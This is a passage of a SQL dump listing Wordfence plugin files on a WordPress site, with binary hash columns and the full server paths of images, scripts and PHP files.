('ÉlX”wÁóBõ*X§Wñ', 'wp-content/plugins/wordfence/images/sort_asc_disabled.gif', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/sort_asc_disabled.gif', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'OÉ§ÅþÍ*ÒXÿ²Û9e', '¯v‰\Zþ|5.YX ©‚÷‰¤òZ–é¹Å¹', '', 0, '?'),
('‘xÃ_,[˜Ô5‰‰†ª', 'wp-content/plugins/wordfence/images/sort_asc_disabled.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/sort_asc_disabled.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '×ÜÇ#a]2…®¼Øë', 'Ÿ‹²û[8lÛYô¢ìåcklþÛ	™u#KVÙÆ‰n', '', 0, '?'),
('?YvŽq_ê—ÿ³Û®XO', 'wp-content/plugins/wordfence/images/sort_both.gif', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/sort_both.gif', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Åá%ÙB¬QxÁSV.D', '’¨„ù6ÆÂ"@XÛg''æW7ÿ°wôËgJ™ßq', '', 0, '?'),
('	7¬®ø¦×îãf	`', 'wp-content/plugins/wordfence/images/sort_both.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/sort_both.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'šd†m	»8Ïf¥|ÅY­ã', '~Â%ïñÛ‰Ž%…‹>öõþˆBl²o‡u·I)È‰7g', '', 0, '?'),
('7Àc÷.$P!×"Œò¹š†', 'wp-content/plugins/wordfence/images/sort_desc.gif', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/sort_desc.gif', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '©<„®ÕjÿŒ_³ËŠR2', '*†ïþ-õ9Ô.¹û¾HGO6/îLÂ):C×dÃzã', '', 0, '?'),
('ZDá°:-hÐ${ãmaÏ', 'wp-content/plugins/wordfence/images/sort_desc.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/sort_desc.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Äã?Õ¦‡)X²?¬N˜', 'bÆEÔšçBŠ#:Â(²#î=_(Å\Z€ŸÚ| ‹Uæ#Ä', '', 0, '?'),
('xy—!àøôqÁ)ö.Ë‰"', 'wp-content/plugins/wordfence/images/sort_desc_disabled.gif', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/sort_desc_disabled.gif', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÎmŽ„†•ÍŸÊärÑÖ 9', ';	Ñ_öYïà·ítŠ7KßÕs—•mCøÞ\råàÊîo', '', 0, '?'),
('ýusÛTÂ­Bâúµä¬B', 'wp-content/plugins/wordfence/images/sort_desc_disabled.png', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/sort_desc_disabled.png', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '½¥J%{O•Z"/Öo', '^*Çn^×\0m+¦‹!NkÊÉŒóŸÏ/©¿Ô¯^k', '', 0, '?'),
('o''RD-”Ü\0¶±¡o‰É', 'wp-content/plugins/wordfence/images/support.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/support.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¬Clâ$£‡r¼“£¼n<.', 'ŽÊ$ãMû¡Ô®¦&æâÃ(á©˜s¬µ^	Ï¢*NÀÞ', '', 0, '?'),
('´PC<ÂÂ	ºÎÛvnàR8', 'wp-content/plugins/wordfence/images/tools.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/tools.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‡ò@cIÜÛËáÅ', 'ÜêY„æ=Üéá¾îîRB)	~òë×ï‚Ü–ÝŸr', '', 0, '?'),
('O+ý­Û[›IB÷ŽÉm‰m''', 'wp-content/plugins/wordfence/images/wf-central-logo.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/wf-central-logo.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'qà(ÏÅVÑ¤ªê®', '\0{\rªß˜²J/× ø^†+áõ,ÎìS™Ð½‹Ÿá', '', 0, '?'),
('Æ@³ð:<¢o|J-e´', 'wp-content/plugins/wordfence/images/wf-error-badge.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/wf-error-badge.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '‰EQtÄØs	¡Mz½y¦÷á', '¿å¨æ®™F¦Î`Äa¤Ý€Þk¶ÝÈmEíQ´¥+~¤ç', '', 0, '?'),
('#«-gå\\L%3ìSÝ‹B#\r', 'wp-content/plugins/wordfence/images/wf-horizontal.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/wf-horizontal.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'E%Zˆlµ°o9Í’ŒžÞ', '¤³0	ÿ·6‚Ó­ëIv›œàµhJì˜ì`äîÇÒ', '', 0, '?'),
('FõV—Èë÷Á¹Od%Ë|u‹', 'wp-content/plugins/wordfence/images/wordfence-logo.svg', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/images/wordfence-logo.svg', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'pÜè±ÑÇ]êj-ã‘ø¦™', '8šü»ÔÚ#Ì„(8øáÿˆOû"Ç	+h"Fb–ìƒ', '', 0, '?'),
('E„»(ýzRA1;eNÇqD3', 'wp-content/plugins/wordfence/index.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/index.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '2ÁèeØÂÂª­ë\\ÆÁog', 'ƒ— ©Šo«ìé¹M¢J#‘A|˜ßŽõ(žÝ;6R\nð', '', 0, '?'),
('­`ƒæ2Ð0°Ø$”¬ô|', 'wp-content/plugins/wordfence/js/admin.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/admin.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ä¨ÇžZ¥ùIÉð ©g_Ž', 'Ó, $B‘~\nµÚÍMÐšñ6]1•1[TL ï–Hp', '', 0, '?'),
('û%úÎzàpOÎ1zJƒ', 'wp-content/plugins/wordfence/js/admin.ajaxWatcher.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/admin.ajaxWatcher.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'NËãðç›Å¯)éôí†âÅ', 'Þ''ƒv¯á¦¸ñøÁ =ª£Ç''X¸këÏ<6YS”tÄ', '', 0, '?'),
(')¦{œ`åÊxýó{5', 'wp-content/plugins/wordfence/js/admin.liveTraffic.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/admin.liveTraffic.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'G¡#fo¥x*È:­‚Ì©§', '‹S÷ôç[z$Ž¢	R¥…d!kV•äMJ.®#£è@8', '', 0, '?'),
('/¢])yýÈLÏ»Ì\rÍ', 'wp-content/plugins/wordfence/js/chart.umd.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/chart.umd.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'b?¨ú\\Ù°õYgD\rz', '¨‡éOdù Çõ:X×®ê RUÅ+ú@Éìþ9', '', 0, '?'),
('\0ƒþ°¹F~M~€žV²', 'wp-content/plugins/wordfence/js/date.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/date.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ŒôÕj½P¾ERÐ_¯cÀ', '€B=ëè0ÕdÆ©"B‰tUc¨¹^1€>–q&ø', '', 0, '?'),
('ùAù%-ŒT=x©U<²', 'wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/jquery-ui-timepicker-addon.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '89"ëîzzøÂVv*ÎØ]', '«Û†%%lí:JÄf<ÈbqãÅP–ÂPtË¯}ß"Õf', '', 0, '?'),
('p™ER‹Rª¦C×­nÔé', 'wp-content/plugins/wordfence/js/jquery.colorbox-min.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/jquery.colorbox-min.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Y5±=ç÷Ìqîþ)–È', 'H¦Ö4\\¼óv÷â/XŒG›÷K†¿—:gkl', '', 0, '?'),
('N¯''mðgz%>rªlå', 'wp-content/plugins/wordfence/js/jquery.colorbox.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/jquery.colorbox.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '(Oˆ0%6Œ9óe§3åj', '{âLý#í\r˜]àý\ngL8P,µü¢@—êIr,{ Ä', '', 0, '?'),
('i»U*¢RÊÝ\0.ÊØâ!]', 'wp-content/plugins/wordfence/js/jquery.qrcode.min.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/jquery.qrcode.min.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ð±×Ô¹°´—Xp`me<', 'wP\0ØpÔzuYDSÞz(W ß¥‰ìP¾3$S‘öò‘', '', 0, '?'),
('^O¿päo	Ýyœ´s>±…', 'wp-content/plugins/wordfence/js/jquery.tmpl.min.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/jquery.tmpl.min.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '€\\}Ã"£†‹7Ú·’•DZ', 'ß.IôH\Z„g\0óH!7`‘£gÞ ZøzÈ„ƒÅ¾6|', '', 0, '?'),
('=¢F‹Žr\n•Þ›<£Ño', 'wp-content/plugins/wordfence/js/knockout-3.5.1.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/knockout-3.5.1.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '(«žaUHwË²I†ÂO', 'ã³Êë&$ÌùzÜè;o,ýàº4‡ca˜‘¦ÿ', '', 0, '?'),
('§Ñ—’²H<ÂÖØ¥V', 'wp-content/plugins/wordfence/js/wfdashboard.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/wfdashboard.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '©£Ô½¬PŸ¬°Í`ß{i¹', '=P¯z×r”ŠŠ!à?w\Z´/d!·½LÓªÄê1!·', '', 0, '?'),
('ñÝÙö/ÆÚ‡É]íÓ¸¹', 'wp-content/plugins/wordfence/js/wfdropdown.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/wfdropdown.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'JÏÂ_Y\Z™TvFu\Zþ', '–×AÒßëÄºKbaº’4÷î-ãt¦$WèËTrPd', '', 0, '?'),
('âwöy¼0BÌx³ÝÀ”', 'wp-content/plugins/wordfence/js/wfglobal.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/wfglobal.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ow{ï	‰bî@ª@=>', '\ZÏ$°u‰é¢	s·$-ÕŸÒi¦%ß±:|Í', '', 0, '?'),
('¯äÃ©rgtµîü»©fÔÅ', 'wp-content/plugins/wordfence/js/wfi18n.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/wfi18n.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'i&XDEîÌò®p/Nï', 'GU	š‹*ŽèköP,¡:Ó?+}xHb·5ÿä°á¬#', '', 0, '?'),
('ß`â­	VË±\\ifìÐx', 'wp-content/plugins/wordfence/js/wfonboarding.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/wfonboarding.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Ï8x+`:.^ÊA[)©T', 'ÀVìp¼Poñ÷VÃ£ãïÔÿ«:‘•CI\\R¹ÅÁd', '', 0, '?'),
('¸Xþ–<£\n€ñy–Už©\0', 'wp-content/plugins/wordfence/js/wfpopover.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/wfpopover.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'öRçð:Rä¤F_™C³FR', '«lŸÚÝ›ñ92Ì‹æ!÷µf/úÀÅ˜!R„ýÌGOµ8', '', 0, '?'),
('–þ³‹Ãb\nŠsš\n', 'wp-content/plugins/wordfence/js/wfselect2.min.1712157296.js', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/js/wfselect2.min.1712157296.js', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÌÄ¡ï Ç§^t¸,g', 'ó uìãV nhCPHÎ]8ËÒ*)Gøý`.råú', '', 0, '?'),
('åR«¹q± vöÚz\rPU', 'wp-content/plugins/wordfence/languages/wordfence.mo', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/languages/wordfence.mo', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'y­aëß:`LŽ±”ÜµO', '—lÃ\\dCä=Ô—/wº(=úGáNùFÑ¡–{(Cc*È', '', 0, '?'),
('UmÌD´ò¿ð3ÉøŽÜ%x', 'wp-content/plugins/wordfence/languages/wordfence.pot', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/languages/wordfence.pot', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¢‘hF«³²`_‡+§W&‰', '\\Î‚§¯ž÷rRNæõw10¸ND~1™0ê¤"', '', 0, '?'),
('RŽµú1?™ûˆYÓVDt»', 'wp-content/plugins/wordfence/lib/.htaccess', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/.htaccess', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '£E"xKÊê{Ç8ödS³', 'C‡¾ö½''r…9½ì@âK¡Þ†t¡ª™öâ§w#@kº', '', 0, '?'),
('Ÿ¸''úFEŸA–vQMv', 'wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/Diff/Renderer/Abstract.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '>\r°Ã5]xVIÖ''Œiµ', 'ÕìG¬ºÝ…''™!óÂY®E¬3¬ÜP5ad‹ºM¾ÿ', '', 0, '?'),
('yŠ­1‰â-è†/fI× ', 'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/Diff/Renderer/Html/Array.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Êã09\rÉ˜a—d·£øP', 'F*OàÐžq^Êl×Êgz·‚,I?ÔbÎRï]KÂÖ³E', '', 0, '?'),
('ë-nê$.ÿ#g%Ä}Ý÷', 'wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/Diff/Renderer/Html/SideBySide.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'å ÂOÙ‘CHŒØ–sº ', 'pX˜Üéuc{ð-ãK×Ú˜ /OnE0œš„)JB', '', 0, '?'),
('`»c0¯žÙ\\ùâë•3æ', 'wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/Diff/SequenceMatcher.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'QD2jF°®D*.e‡–q', '5r]ÿ¾$1ä˜¦ó\0jfFîŸŒîD\0t%‰gúçq', '', 0, '?'),
('Û–JBw…C˜¡|Môv', 'wp-content/plugins/wordfence/lib/Diff.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/Diff.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '¥5VzY³]ª#yR•ÛJÝ®', 'YÁMÁ"z)tÏ–©‚Ö*c‰wL\0¢‚ý‘´1w$dƒóû', '', 0, '?'),
('‘Ô¸€¢%\ZDéŽyó³Z', 'wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/GeoLite2-Country.mmdb', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ò›È|®–2»ÞãÖRy†', '-$Ý00êÑ,8\\\nìÚ9`ñ’íeL=šNªý#Wäh', '', 0, '?'),
('ÖÏJØûï!¬[W6Ý§éý', 'wp-content/plugins/wordfence/lib/IPTraf.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/IPTraf.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '†«8ùwÞVX¯8¾›~$òö', '¯ï ©%ïÊõÊmÂüùèò³š«-[«\0:ˆ& ý', '', 0, '?'),
('¬^2^£Tš:ÈmJ‡ø:­', 'wp-content/plugins/wordfence/lib/IPTrafList.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/IPTrafList.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'UIË&’” §ŸI', '›a…k*a\r£‡ôÙtÒ·Ì ½ØÂ¾Ž^ÔJ³O', '', 0, '?'),
('ëa¶Žu"9s?‚H€øÆå', 'wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/WFLSPHP52Compatability.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ƒü%1ùs¬˜¥Ã‹G', 'E”„WÙ³¦?Ì4èè…@U?¬0‰€ëbPº+æh', '', 0, '?'),
('K¾ä÷ßºá†b¤', 'wp-content/plugins/wordfence/lib/compat.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/compat.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '>îµãøÎzðx”ŠCŠ}', '¾NÜ“»#dÒt¤B!"MÕžÿ==Ë@o‚²', '', 0, '?'),
('\Zµ;5õ(žOòOÖR«', 'wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'áþµÇ›ˆ¡ÆýlmˆD!', 'Ö''ß9‹\r9Š\0o|óë\ZØÀ§ŸÛñÞ|•·¿0K', '', 0, '?'),
('²ùzvo:ø·ÜB%šºðõ', 'wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'IÃh…ƒ®%u-C\0Ä', '"YÂ¤&6HU¾^é·''ý$±žå=_;>þ°§æ', '', 0, '?'),
('\rÒ—èr×¾ˆ Á¹Î\nœ\Z', 'wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '$ë@‡æ­ÿüÞ¯]œ»&', '7aP±ó\\Tâ å£é"Såz·±ÞJÎ&bÕÙ¸Â®D', '', 0, '?'),
('ºß$á„o“¬1ÖT³2]l', 'wp-content/plugins/wordfence/lib/dashboard/widget_countries.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/dashboard/widget_countries.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '›	›Âd*W·Ë‚ÿÃ1g›', 'Ç+qÒ~;f€E_Î#Ñ]I·V\\ðk?l¶•ËÃÏžé', '', 0, '?'),
('Wsåç{NÎhP—ršã¼±', 'wp-content/plugins/wordfence/lib/dashboard/widget_ips.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/dashboard/widget_ips.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'áwàð·9Ê64"òky', 'øXù“Œ•ÖóÍ"vÑù’‹Ä-*¼ô£í­·ºøñ3', '', 0, '?'),
('eØŸ÷v¤‹ãç¬ª‹Ej', 'wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Í ¾UwYI‰äIÐ}â', '½ø¿Ý \réñÚ—UòDôPTÁûÉV+6€Ñ^:2!ƒØÙ', '', 0, '?'),
('ŸúƒLâÔ.\nÞw;[', 'wp-content/plugins/wordfence/lib/dashboard/widget_logins.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/dashboard/widget_logins.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'E	4múY×>À`•ú', 'Ù#·_§[Ñ¸¾î@u¸HaÆ(+j>V\Z+ºq[V', '', 0, '?'),
('òu;ÈŒ0åq”wªœ=àß', 'wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '1€A¤×¶«$^>ô¿“Ë', 'p}ø:\\O•š²ÛÅéÎçÕ1QÜõ6Xy³ŒTYÖë', '', 0, '?'),
('k6„þ *âÜßHœ	ŒuÙ¡', 'wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '›x¡Úª)tdE«ä;·Ö™', '?ÓŸqc¼ŠAÙ\Z·Qš<Ls÷¶Âuž:ŸI.éÂÌÏ', '', 0, '?'),
('Í)ÄÅäò\0Ÿe‡_Ô5=«', 'wp-content/plugins/wordfence/lib/diffResult.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/diffResult.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'gèQ ¼ª½ífú7ÅF', 'õÒŽ“ÎEÔõˆóØŠ>^!jº¡\0O’€ÆcaŠ´^°Ò', '', 0, '?'),
('#\nÁô/†ÛPZ~h„Îø', 'wp-content/plugins/wordfence/lib/email_genericAlert.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/email_genericAlert.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '+I*kCûe;ÐP¸¡Œ¬S', 'Š _''\\qÈËüF0´‹{ÆþÐ¢FÑ\rÒƒ.æ OK', '', 0, '?'),
('›» ÆíFe±	57[é', 'wp-content/plugins/wordfence/lib/email_newIssues.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/email_newIssues.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ÇFŽzQ¯èùÖ}  •¿Ð0', ']Ç› »ácIãŽT¤–)Í£xn%}IëmFb‡É', '', 0, '?'),
('×ä^Ëu©­âË}G»Ô', 'wp-content/plugins/wordfence/lib/email_unlockRequest.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/email_unlockRequest.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'ð¤Î~ÍŸñìþak±Ö', 'u\Z g$}o¨‚ûëbÄ„ñ+\r ã\n¸»±8²', '', 0, '?'),
('e\0ÀÍýžhóL‰ú‰Ñ‰¸ç', 'wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'YÁâØÑ±Æ”Uy¤þ{š', 'pa™þŠÂiŒñvöÂINa''%ÖâfE?ŸMvøÐ', '', 0, '?'),
('ï*Q.	Ö-cÞ%ÎD', 'wp-content/plugins/wordfence/lib/flags.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/flags.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'öiïËcÒç£­µ’cð-', '8¶Y¸ÖCOå×ø™0÷j{¡\Zx¤¤DòÄ–¿’xªO§', '', 0, '?'),
('$äÎ-#q`Ðl$W„Û‰', 'wp-content/plugins/wordfence/lib/live_activity.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/live_activity.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'žþæik³ê™s', '^&†Vðb™Ç,›•s×ÄB^í—R£4¾Ñ¸ƒ©ÅV', '', 0, '?'),
('òdíToÈf‹öÒ·ÜbS', 'wp-content/plugins/wordfence/lib/menu_dashboard.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_dashboard.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '©HÌÂ£æ{ø=7Â§x ', '³wÚ½Ã¾$7……ƒëŠ!#XXŠIœ{@X{COð', '', 0, '?'),
('Þ’¶?IñÎ©i%úýgÆyÁ', 'wp-content/plugins/wordfence/lib/menu_dashboard_options.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_dashboard_options.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'åxÔÐUÒéºÃeæúÒµS', 'Hˆ¦þ#Ý‚yf¾ö¨6A˜ŠU(714ªJŠ2Ù', '', 0, '?'),
('®W«‡µPæ—ƒ^qðy€', 'wp-content/plugins/wordfence/lib/menu_firewall.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_firewall.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '!ñ%røÁ''NP-XÏ¼ÓA', 'Ë`\n\\Ç-âj‰-dÆÑZ{%îpá¨jõˆ¢¸Aúó', '', 0, '?'),
('3•dý¤ƒâyjäéßÎóV', 'wp-content/plugins/wordfence/lib/menu_firewall_blocking.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_firewall_blocking.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '@O<Ô.<)‚$Ã÷Þ“Á´', '\ZÞ›pŠÿ	†œä>¦áB*''¼ã^ÀÒ–ŒTÕ', '', 0, '?'),
('Í¶”jÊƒà°±ýÿ·-¦', 'wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Óþd(Éª»Ê''G^Çe[1', 'sX«§rÉ™·ïñ{r‡.ƒRX\0‡ð qÎ™@ø', '', 0, '?'),
('6cÀb†£kk·Öi3¹@úH', 'wp-content/plugins/wordfence/lib/menu_firewall_waf.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_firewall_waf.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'Çëm}é#`:ªáPo/Ù', '(ž›Ë•‹=9L”/¨Û*mž,{oÖ7ÜºhVTõÚ\\', '', 0, '?'),
('0ÐdÛ¦ZPÉø2ñ¾oëˆ', 'wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', 'xM¤g­÷_Ÿzv7’I', '×]€/®r¨‡^Q@ë–±w#²Ÿ4!‘­Ÿ‹¾î', '', 0, '?'),
('úÔ¥d6g]Q£ƒ‰O#>þ', 'wp-content/plugins/wordfence/lib/menu_install.php', '/home/equipm11/public_html/happythinking.com/wp-content/plugins/wordfence/lib/menu_install.php', 1, '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0', '§ÇtLYNËÈð®Þ²Û', 'VÛ½þ’%à²£#Ç‡Øo•§s€"M\\ÿ>6–°ˆá', '', 0, '?'),
